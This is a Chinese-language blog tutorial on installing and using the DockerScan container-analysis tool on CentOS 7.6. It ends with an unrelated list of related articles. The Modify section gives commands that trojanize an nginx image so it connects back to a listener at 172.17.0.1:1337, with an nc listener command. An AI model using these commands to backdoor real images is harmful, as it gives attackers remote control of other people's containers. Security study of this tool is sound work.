前言

  本篇简单介绍Docker扫描工具DockerScan的安装使用。下述过程是在CentOS 7.6的虚拟机上进行的。

[root@localhost ~]# cat /etc/redhat-release

CentOS Linux release 7.6.1810 (Core)

Docker安装

  安装过程请参考

安装Python3

  CentOS 7.6默认自带python 2.7.5。

[root@localhost ~]# python --version

Python 2.7.

  CentOS的软件版本都比较老,DockerScan需python 3支持,使用yum命令直接安装即可。

[root@localhost ~]# yum install python3 -y              # 安装python3 
[root@localhost ~]# python3 --version                 # 查看python3 版本       

Python 3.6.
[root@localhost ~]# pip3 --version                   # 查看pip3版本

pip 9.0. from /usr/lib/python3./site-packages (python 3.6)

DockerScan安装

  使用pip3即可直接下载安装DockerScan,十分方便。

[root@localhost ~]# pip3 install dockerscan

WARNING: Running pip install with root privileges is generally not a good idea. Try `pip3 install --user` instead.

Requirement already satisfied: dockerscan in /usr/local/lib/python3./site-packages

Requirement already satisfied: click==6.7 in /usr/local/lib/python3./site-packages (from dockerscan)

Requirement already satisfied: booby-ng==0.8. in /usr/local/lib/python3./site-packages (from dockerscan)

Requirement already satisfied: requests==2.13. in /usr/local/lib/python3./site-packages (from dockerscan)

Requirement already satisfied: colorlog==2.10. in /usr/local/lib/python3./site-packages (from dockerscan)

Requirement already satisfied: python-dxf==4.0. in /usr/local/lib/python3./site-packages (from dockerscan)

Requirement already satisfied: six in /usr/local/lib/python3./site-packages (from booby-ng==0.8.->dockerscan)

Requirement already satisfied: ecdsa>=0.13 in /usr/local/lib/python3./site-packages (from python-dxf==4.0.->dockerscan)

Requirement already satisfied: www-authenticate>=0.9. in /usr/local/lib/python3./site-packages (from python-dxf==4.0.->dockerscan)

Requirement already satisfied: jws>=0.1. in /usr/local/lib/python3./site-packages (from python-dxf==4.0.->dockerscan)

Requirement already satisfied: tqdm>=4.10. in /usr/local/lib/python3./site-packages (from python-dxf==4.0.->dockerscan)

测试镜像

  我们可以使用一些镜像Hub里的Docker镜像进行测试。

[root@localhost docker]# pwd

/root/docker

[root@localhost docker]# ls

[root@localhost docker]# docker pull mysql      # 拉取mysql docker镜像

Using default tag: latest

latest: Pulling from library/mysql

80369df48736: Pull complete

e8f52315cb10: Pull complete

cf2189b391fc: Pull complete

cc98f645c682: Pull complete

27a27ac83f74: Pull complete

fa1f04453414: Pull complete

d45bf7d22d33: Pull complete

3dbac26e409c: Pull complete

9017140fb8c1: Verifying Checksum

b76dda2673ae: Download complete

bea9eb46d12a: Download complete

e1f050a38d0f: Download complete

latest: Pulling from library/mysql

80369df48736: Pull complete

e8f52315cb10: Pull complete

cf2189b391fc: Pull complete

cc98f645c682: Pull complete

27a27ac83f74: Pull complete

fa1f04453414: Pull complete

d45bf7d22d33: Pull complete

3dbac26e409c: Pull complete

9017140fb8c1: Pull complete

b76dda2673ae: Pull complete

bea9eb46d12a: Pull complete

e1f050a38d0f: Pull complete

Digest: sha256:7345ce4ce6f0c1771d01fa333b8edb2c606ca59d385f69575f8e3e2ec6695eee

Status: Downloaded newer image for mysql:latest

docker.io/library/mysql:latest

[root@localhost docker]# docker images                # 查看本地docker镜像

REPOSITORY          TAG                 IMAGE ID            CREATED             SIZE

mysql               latest              c8ee894bd2bd         days ago          456MB

[root@localhost docker]# docker save -o mysql.tar mysql    # 导出docker镜像

[root@localhost docker]# ls

mysql.tar

DockerScan使用

说明

  目前DockerScan还没有一些比较正式的官方文档,只能自己一边摸索着使用了。

  帮助文档:

[root@localhost ~]# dockerscan --help

Usage: dockerscan [OPTIONS] COMMAND [ARGS]...

Options:

  -v           Verbose output

  -d           enable debug

  -q, --quiet  Minimal output

  --version    Show the version and exit.

  -h, --help   Show this message and exit.

Commands:

  image     Docker images commands

  registry  Docker registry actions

  scan      Search for Open Docker Registries

  从上可以看到,目前主要支持三个命令:image、registry、scan。 【2019.10.22】

image命令

  可以使用dockerscan image --help查看子命令更细致的帮助文档。

[root@localhost docker]# dockerscan image --help          # 查看帮助文档

Usage: dockerscan image [OPTIONS] COMMAND [ARGS]...

  Docker images commands

Options:

  -h, --help  Show this message and exit.

Commands:

  analyze  looking for sensitive data from docker image      # 分析

  extract  extract docker image content                # 抽取docker镜像内容

  info     get docker image information                # 获取docker镜像信息

  modify   Modify a docker image commands               # 修改docker镜像命令

info

  使用info子命令查看docker镜像信息。

[root@localhost docker]# dockerscan image info mysql.tar       # info查看docker镜像信息

[ * ] Starting analyzing docker image...

[ * ] Selected image: 'mysql.tar'

[ * ] Analysis finished. Results:

[ * ] - Entry point:

[ * ]   > docker-entrypoint.sh              

[ * ] - Created date = --17T04::.532313415Z

[ * ] - Docker version = 18.06.-ce              # docker版本信息

[ * ] - Cmd = mysqld

[ * ] - Environment:

[ * ]   > PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

[ * ]   > GOSU_VERSION=1.7

[ * ]   > MYSQL_MAJOR=8.0      

[ * ]   > MYSQL_VERSION=8.0.-1debian9             # mysqld的版本,当前最新版

[ * ] - Exposed ports:                      # 暴露的端口

[ * ]   > :

[ * ]     + tcp

[ * ]   > :

[ * ]     + tcp

  由上可知,关于docker镜像的一些信息。

Analyze

[root@localhost docker]# dockerscan image analyze mysql.tar     # analyze分析docker镜像

[ * ] Starting the analysis of docker image...

[ * ] Selected image: 'mysql.tar'

[ * ] Analysis finished. Results:

[ * ] - Running user = root                        # 功能有限,仅能分析出是以root运行

Extract

[root@localhost docker]# dockerscan image extract ./mysql.tar ./mysql    # 提取镜像文件

[ * ] Starting the extraction of docker image...

[ * ] Selected image: 'mysql.tar'

[ * ] Image content extracted

root@localhost docker]# ls mysql     # mysql文件夹下就是典型的linux文件系统目录结构

bin  boot  dev  docker-entrypoint-initdb.d  entrypoint.sh  etc  home  lib  lib64  media  mnt  opt  proc  root  run  sbin  srv  sys  tmp  usr  var

[root@localhost docker]# cat ./mysql/etc/passwd | head -      # 查看/etc/passwd文件内容

root:x:::root:/root:/bin/bash

daemon:x:::daemon:/usr/sbin:/usr/sbin/nologin

bin:x:::bin:/bin:/usr/sbin/nologin

Modify

  modify子命令可以用来修改docker镜像,如果某个恶意攻击者在docker镜像中加入一些恶意操作,并且如果被部署,则攻击者能远程控制这些docker容器。

  如修改导出nginx image文件导出为nginx-trojanized,每次运行该容器将连接172.17.0.1:1337。

# dockerscan image modify trojanize ./nginx.tar -l 172.17.0.1 -p  -o nginx-trojanized

# docker rmi nginx                          # 删除nginx image

# docker load -i nginx-trojanized.tar       # 导入修改nginx-trojanized.tar 镜像

# docker run nginx:latest              # 运行该镜像

  另一端进行监听1337端口:

# nc -v -k -l 172.17.0.1

Misc

  Dockerscan 另外两个子命令registry、scan没有什么安全扫描功能。

  registry用于上传下载image。

  scan暂不明使用方法,以及有何功能。

  总体上感觉,dockerscan的功能还不够:).

Docker安全扫描工具之DockerScan的更多相关文章

  1. Docker安全扫描工具之Anchore

    本篇简单介绍一款Docker安全扫描工具Anchore的安装和使用. 前言 下述过程是在CentOS 7.6的虚拟机上进行的. [root@localhost ~]# cat /etc/redhat- ...

  2. Docker安全扫描工具之docker-bench-security

    简介 Docker Bench for Security检查关于在生产环境中部署Docker容器的几十个常见最佳实践.这些测试都是自动化的,其灵感来自CIS Docker基准1.2.0版. 这种安全扫 ...

  3. Trivy 容器镜像扫描工具学习

    简介 官方地址:https://github.com/aquasecurity/trivy Trivy是aqua(专注云原生场景下的安全)公司的一款开源工具,之前历史文章也有对aqua的一些介绍. T ...

  4. 域名扫描工具Fierce

    域名扫描工具Fierce   该工具是一个域名扫描综合性工具.它可以快速获取指定域名的DNS服务器,并检查是否存在区域传输(Zone Transfer)漏洞.如果不存在该漏洞,会自动执行暴力破解,以获 ...

  5. NMAP分布式扫描工具dnmap

    NMAP分布式扫描工具dnmap   NMAP是一款知名的网络扫描工具.它提供丰富和强大的网络扫描功能.但很多时候,需要渗透测试人员从多个终端发起扫描任务,以快速扫描大型网络,或规避IP限制等安全策略 ...

  6. Nikto是一款Web安全扫描工具,可以扫描指定主机的web类型,主机名,特定目录,cookie,特定CGI漏洞,XSS漏洞,SQL注入漏洞等,非常强大滴说。。。

    Nikto是一款Web安全扫描工具,可以扫描指定主机的web类型,主机名,特定目录,cookie,特定CGI漏洞,XSS漏洞,SQL注入漏洞等,非常强大滴说... root@xi4ojin:~# cd ...

  7. 网站安全扫描工具--Netsparker的使用

    Netsparker是一款安全简单的web应用安全漏电扫描工具.该软件功能非常强大,使用方便.Netsparker与其他综合 性的web应用安全扫描工具相比的一个特点是它能够更好的检测SQL Inje ...

  8. 小白日记34:kali渗透测试之Web渗透-扫描工具-Burpsuite(二)

    扫描工具-Burpsuite 公共模块 0.Spider 爬网 手动爬网 先禁用截断功能 手动将页面中点击所有连接,对提交数据的地方,都进行提交[无论内容] 自动爬网[参数设置] 指定爬网路径,否则其 ...

  9. 小白日记32:kali渗透测试之Web渗透-扫描工具-QWASP_ZAP

    扫描工具-QWASP_ZAP 十大安全工具之一,集成性工具,功能完善,而且强大.既可做主动扫描,也可做截断代理.开源免费跨平台,简单易用,体验相对混乱,但在主动扫描方面,相对占优.[kali集成] # ...

随机推荐

  1. 如何在VMware下通过挂载系统光盘搭建本地yum软件仓库

    1.打开自己VMware软件中的虚拟机 2.输入用户名root密码登陆进去 3.打开 应用程序----收藏-----终端 4.首先回到根目录,输入cd ..(中间有空格) 5.创建一个名称为swlaa ...

  2. PHP和JavaScript中奖概率算法

    这是一个经典的概率算法. 现在有数组:[10, 20, 30, 40] . 假设对应中奖几率:特等奖10%,一等奖20%,二等奖30%,三等奖40%,总共100%. 算法开始时,从数组中选出一个值$v ...

  3. 转:Eclipse中创建Maven版的Web工程(详解)

    一.搭建步骤 ♦首先创建一个Maven的Project,如下图: ♦点击Next,勾选 Create a simple project ♦点击Next,注意Packing要选择war,因为我们创建的是 ...

  4. JS的对象、数组等处理方法:解构

    对象方法简写 你可以在定义方法时省略function和 :: const obj = { insteadOfThis: function() { // do stuff }, youCanDoThis ...

  5. shell执行数学运算

    整数: expr let $(()) $[] 浮点数: bc 1.使用expr ♦参与运算的成员和运算符之间必须有一个空格: ♦对于那些容易被shell错解的,在它们传入expr命令之前,需要使用sh ...

  6. CodeForces999A-Mishka and Contest

    A. Mishka and Contest time limit per test 1 second memory limit per test 256 megabytes input standar ...

  7. CSU OJ2151 集训难度

    小L正在组织acm暑假集训,但众所周知,暑假集训的萌新中有OI神犇,也有暑假才开始学算法的萌新,如果统一集训的难度,无法很好地让萌新们得到训练,所以小L想了一个办法,根据每次测试的情况,改变萌新们的集 ...

  8. tensorflow mnist模块详解

    tensorflow的官方文档是以mnist数据集为例子开始的.文档本身没有介绍tensorflow.contrib.learn.python.learn.datasets.mnist模块.要想用te ...

  9. Nginx的定时事件的实现(timer)

    Nginx的定时事件的实现(timer) 在前面的文章里面就说到了在事件循环中除了要处理所有的从epoll中获取的事件之外,还要处理一些timer事件,这篇文章就讲讲Nginx的timer是如何实现的 ...

  10. layedit添加首行缩进

    由于在编辑的时候,有首行缩进的需求,并且,如果直接使用空格进行缩进,还会出现layedit看到的效果和实际显示的效果不一致的情况.多方搜索无果,于是决定修改源代码.具体步骤如下: 1.首先找到laye ...